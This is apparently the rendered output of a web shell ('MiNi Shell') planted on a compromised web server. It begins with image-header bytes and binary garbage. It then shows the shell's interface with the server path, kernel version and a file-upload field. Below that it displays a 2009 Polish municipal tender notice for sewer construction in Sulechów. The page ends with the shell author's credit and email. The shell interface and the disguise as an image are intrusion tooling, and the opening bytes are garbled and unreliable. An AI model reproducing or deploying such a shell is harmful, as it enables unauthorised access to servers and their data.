JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/137782-N-2009.html

<p class="kh_header"><b>Sulechów: BUDOWA KANALIZACJI SANITARNEJ  W ULICACH: H. SIENKIEWICZA, WIEJSKA, S. LEMA, J. SŁOWACKIEGO W BRZEZIU K. SULECHOWA WRAZ Z TŁOCZNIĄ ŚCIEKÓW I PRZYKANALIKAMI</b><br>
<b>Numer ogłoszenia: 137782 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA KANALIZACJI SANITARNEJ  W ULICACH: H. SIENKIEWICZA, WIEJSKA, S. LEMA, J. SŁOWACKIEGO W BRZEZIU K. SULECHOWA WRAZ Z TŁOCZNIĄ ŚCIEKÓW I PRZYKANALIKAMI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje wykonanie kanalizacji sanitarnej w systemie grawitacyjno-ciśnieniowym w ulicach: H. Sienkiewicza, Wiejska, S. Lema, J. Słowackiego w Brzeziu k. Sulechowa wraz tłocznią ścieków i przykanalikami. Zakres robót do wykonania obejmuje m.in.:
1)	sieć grawitacyjną PVC O 200 mm - 1945,3 m, na odcinkach:
od.SW1 do SR1
kanał KS-1.9	od S65 do S57,
kanał KS-1	od tłoczni ścieków do S57, od S57 do S55, od S55 do S54, od S54 poprzez S29 do S28,
kanał KS-1.8 od S55 poprzez S121 do S132,
kanał KS-1.7	od S45 do S115,
kanał KS-1.6	od S42 do S112,
kanał KS-1.5 od S42 do S100,
kanał KS-1.4 od S29 do S98,
w tym m. in.: 
a)	roboty ziemne - wykopy wykonywane ręcznie i mechanicznie, umocnienie ścian wykopów liniowych, odwodnienie wykopów powierzchniowe i przy pomocy igłofiltrów, podsypka rurociągów z piasku o grubości min 10 cm, 
b)	ułożenie kanałów grawitacyjnych - 1945,3 m - z rur kanalizacyjnych klasy S kielichowych z PVC O 200/5,9mm o ścianie litej i kształtek z PCV O 200mm o ścianie litej łączonych na uszczelki gumowe typu P, obsypka kanałów z piasku o min. gr. po zagęszczeniu 30cm, 
c)	montaż małogabarytowych studni inspekcyjnych PP O 425 mm na kanałach O 200 mm - 65 szt. - złożonych z: kinety studzienki rewizyjnej PP O 425/200 mm wraz z uszczelkami dla rur karbowanych, rury karbowanej (trzon studzienki kanalizacyjnej, rury teleskopowej d=425 i pokrywy żeliwnej typu ciężkiego do 40T, prefabrykowanego pierścienia odciążająco-dociążającego, 
d)	montaż studni z kręgów żelbetowych O 1200/1500mm - 10 kpl, - o konstrukcji zgodnie z normą KB-4.12.1/6/, z włazami żeliwnymi typu ciężkiego, pokrywami nadstudziennymi z pierścieniem żelbetowym odciążającym, w studniach - przejścia szczelne dla rur O 200mm i O 160mm przez ściany studni, stopnie złazowe żeliwne,
e)	próby szczelności, zasypanie wykopów, 
f)	przecisk pod drogą krajową nr 3 od studni S34 do S33; 
2)	sieć grawitacyjną PVC O 160 mm - przykanaliki - 287,6 m, w tym m. in.:
a)	roboty ziemne - wykopy wykonywane ręcznie i mechanicznie, umocnienie ścian wykopów liniowych, odwodnienie wykopów powierzchniowe i przy pomocy igłofiltrów, podsypka z piasku o grubości min 10cm, 
b)	ułożenie kanałów grawitacyjnych - rury kielichowe z PVC O 160mm o ścianie litej łą-czone na uszczelki gumowe typu P, obsypka kanałów z piasku o min. grubości po za-gęszczeniu 30cm, 
c)	montaż małogabarytowych studni inspekcyjnych PP O 315 mm na kanałach O 200 mm - 30 szt. - złożonych z: kinety studzienki rewizyjnej PP O 315/160 mm wraz z uszczelkami dla rur karbowanych, rury karbowanej (trzon studzienki kanalizacyjnej, rury teleskopowej d=315 i pokrywy żeliwnej typu ciężkiego do 40T, prefabrykowanego pierścienia odciążająco-dociążającego, 
d)	zasypanie wykopów.
3)	sieć ciśnieniową z rur polietylenowych SDR 17,6 O 90/5,1 mm o długości 217,5 m na odcinku od SR1 do tłoczni ścieków, w tym m. in.:
a)	roboty ziemne - wykopy wykonywane ręcznie i mechanicznie, umocnienie ścian wykopów liniowych, odwodnienie wykopów powierzchniowe i przy pomocy igłofiltrów, podsypka z piasku o grubości min 10cm, 
b)	ułożenie kanałów ciśnieniowych z rur PE 80 SDR 17,6 O 90/5,1 mm, łączonych za pomocą zgrzewania doczołowego, obsypka kanałów z piasku o min. gr. po zagęszczeniu 30cm, 
c)	studnia rozprężna - 1 kpl - z kręgów betonowych, właz żeliwny typu ciężkiego do 40t - 1 kpl, pokrywa nadstudzienna z pierścieniem żelbetowym odciążającym,
d)	próby szczelności, zasypanie wykopów.
4)	tłocznię ścieków - 1 kpl w tym m. in.: 
a)	tłocznia ścieków TSA.1.60 Hydro Vacuum - 1 kpl - zgodnie z opisem w projekcie;
b)	ogrodzenie o wysokości 2,0 m z siatki powlekanej na słupkach stalowych w rozstawie ok. 2,10 m z rur ocynkowanych O 76mm/3,5mm obetonowanych w ziemi - 17,0m, brama wjazdowa z furtką o szerokości 3,0m + 1,0 z siatki; po obrysie ogrodzenia - krawężnik betonowy 20x30 cm na ławie betonowej z oporem - 21,0 m;
c)	utwardzenie terenu tłoczni płytami drogowymi betonowymi ażurowymi w ilości 19,4m2;
d)	roboty elektryczne - wg projektu i warunków przyłączenia do sieci elektroenergetycznej ENEA SA; na terenie przepompowni zamontować słup oświetleniowy typu parkowego z lampą rtęciowo-żarową z kloszem nietłukącym, kabel do zasilania lampy YAKY 3x5mm2, szafkę zasilająco-sterowniczą oraz kabel od złącza kablowego na granicy nieruchomości do szafki zasilająco-sterowniczej; komplet pomiarów, badań i sprawdzeń.
5)	odtworzenie nawierzchni dróg gruntowych - 300,0 m2 - poprzez wyprofilowanie podłoża, ułożenie warstwy odcinającej z piasku o grubości po zagęszczeniu 5 cm, ułożenie tłucznia bazaltowego o grubości warstwy po zagęszczeniu 15 cm o granulacji 0-31,5mm.
         Uwaga: drogi gruntowe w obrębie prowadzonych robót aktualnie są utwardzone warstwą tłucznia bazaltowego - Wykonawca winien odtworzyć drogi do stanu pierwotnego po robotach ziemnych wykorzystując materiał kamienny zebrany przed rozpoczęciem wykopów z dróg gruntowych. 
2.	Szczegółowy zakres robót określa dokumentacja projektowa oraz specyfikacje techniczne wy-konania i odbioru robót opracowane przez Biuro Planowania i Kreśleń Technicznych z siedzibą w Międzyrzeczu przy ul. Reymonta 5. 
Uwaga  - dokumentacja projektowa obejmuje budowę sieci kanalizacyjnej dla lewej części wsi Brzezie k. Sulechowa, natomiast przedmiotem zamówienia jest budowa kanalizacji sanitarnej w systemie grawitacyjno-ciśnieniowym w obszarze ulic: H. Sienkiewicza, Wiejska, S. Lema i  J. Słowackiego na odcinkach podanych w opisie przedmiotu zamówienia w ust. 1 wraz z przykanalikami i tłocznią ścieków.
3.	Zadanie inwestycyjne, o którym mowa w ust. 1 powyżej, realizowane będzie na podstawie de-cyzji o pozwoleniu na budowę:
1)	Starosty Zielonogórskiego nr  204/08 z dnia 03.03.2008r. 
2)	Wojewody Lubuskiego nr 38/08 z dnia 11.03.2008r
4.	Wartość przedmiotu zamówienia należy określić na podstawie projektu budowlanego, wyko-nawczego, specyfikacji technicznych wykonania i odbioru robót oraz innych danych np. uzyskanych w czasie wizji lokalnej w terenie. 
       Dołączony do specyfikacji przedmiar robót należy traktować pomocniczo. Za ustalenie dokładnej ilości robót, materiałów i urządzeń oraz innych prac niezbędnych do wykonania kompletnego przedmiotu zamówienia odpowiada wyłącznie Wykonawca.
5.	Wykonawca musi uwzględnić:
1)	wywiezienie ziemi urodzajnej w miejsce wskazane przez Zamawiającego na terenie miasta;
2)	wywiezienie gruzu i innych materiałów rozbiórkowych - w cenie należy uwzględnić transport do podmiotu zajmującego się odzyskiem odpadów lub transport i składowanie na składowisku odpadów - dotyczy tej części materiałów, które zgodnie z odrębnymi przepisami zalicza się do odpadów; Wykonawca winien posiadać stosowne zezwolenie na transport odpadów lub wykonać tę część zamówienia przy pomocy podmiotu, który takowe posiada;
3)	badanie wskaźnika zagęszczenia gruntu przy czym Is>1, a częstotliwość badań wskaźnika Is min. jedno badanie na 500 m2;
4)	W robotach odtworzeniowych nie dopuszcza się stosowania tłucznia pomiedziowego.
6.	Wykonawca może przewidzieć wykonanie zamówienia przez podwykonawców..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.23.24.23-3, 45.23.24.40-8, 45.31.12.00-2, 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 40.000,- zł ( słownie: czterdzieści tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Wykonawca musi spełniać warunki zawarte w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 24 ust. 1 i 2 i w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
2.	Sytuacja finansowa:
2.1.	Wykonawca musi udokumentować, że dysponuje środkami finansowymi wystarczają-cymi do realizacji przedmiotu zamówienia przy założeniu, że:
1)	wynagrodzenie za zakres robót objęty zamówieniem do wysokości 80% (osiemdziesiąt procent) będzie wypłacane w miarę realizacji robót, na podstawie częściowych faktur VAT, wystawianych przez Wykonawcę i doręczanych Zamawiającemu każdorazowo po wykonaniu części przedmiotu zamówienia, nie częściej niż raz w miesiącu zgodnie z harmonogramem rzeczowo-finansowym, po dokonaniu odbioru częściowego bez zastrzeżeń, przy czym pierwsza faktura VAT za realizację robót stanowiących przedmiot zamówienia może być wystawiona po wykonaniu robót o wartości nie niższej niż 20% (dwadzieścia procent) wartości przedmiotu zamówienia;
2)	pozostałe 20% (dwadzieścia procent) wynagrodzenia zostanie wypłacone Wy-konawcy po zakończeniu  realizacji zadania i dokonaniu odbioru końcowego.
2.2.	Wykonawca musi wykazać że posiada polisę ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności.   
3.	Doświadczenie zawodowe:
Wykonawca musi wykazać, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie wykonał z należytą starannością co najmniej trzy zadania polegające na budowie kanalizacji sanitarnej, przy czym w każdym z tych zadań musi wystąpić wykonanie: kanalizacji grawitacyjnej z przykanalikami, kanalizacji ciśnieniowej i przepompowni lub tłoczni ścieków.
4.	Potencjał kadrowy:
Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, w tym:
1)	kierownik budowy z uprawnieniami do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń posiadający minimum 2 letnie doświadczenie w kierowaniu robót,
2)	pracownik z uprawnieniami do kierowania robotami w specjalności instalacyjnej w  zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Ocena spełniania warunków udziału, w postępowaniu, przez Wykonawców zostanie dokonana według kryterium spełnia/nie spełnia. Wykonawca nie spełniający warunków zostanie wykluczony z postępowania, a jego oferta odrzucona.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 9.	Oświadczenia i dokumenty, jakie Wykonawca musi dostarczyć w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz inne dokumenty jakie należy złożyć razem z ofertą:
1.	Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
1.1.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 2 do Instrukcji dla Wykonawców.
1.2.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych do oferty należy dołączyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
1.3.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówieni zgodnie z opisanymi warunkami udziału w postępowaniu  do oferty musi być dołączony:
1.3.1.	Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenia zamówienia, a jeżeli okres prowadzenia działal-ności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania - załącznik nr 3 do I rozdziału SIWZ - wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje od poprzednich Zamawiających). W wykazie należy wykazać co najmniej roboty, o których mowa w pkt III ppkt 1.3 SIWZ.
1.3.2.	Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik nr 4 do I rozdziału SIWZ. W wykazie należy wykazać co najmniej osoby wymienione w pkt III ppkt 1.4 SIWZ.
1.3.3.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 1.3.2. wykonawca wskazał osoby, którymi będzie dysponował.
1.4	W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty musi zostać dołączona polisa, a przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
2.	Inne dokumenty:
2.1.	Wypełniony formularz oferty na załączniku nr 1 do I rozdziału SIWZ.
2.2.	Wypełniony załącznik nr 1a do I rozdziału SIWZ - Dane Wykonawcy.
2.3.	Wypełniony harmonogram rzeczowo-finansowy - załącznik nr 5 do I rozdziału SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ na wniosek Wykonawcy w siedzibie Zamawiającego (Gmina Sulechów Plac Ratuszowy 6 66-100 Sulechów) w cenie: 120,- zł + koszty przesyłki ok. 30,- zł razem 150,00 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:30, miejsce: Gmina Sulechów Plac Ratuszowy 6 66-100 Sulechów, Biuro Obsługi Interesanta pok nr 002 parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com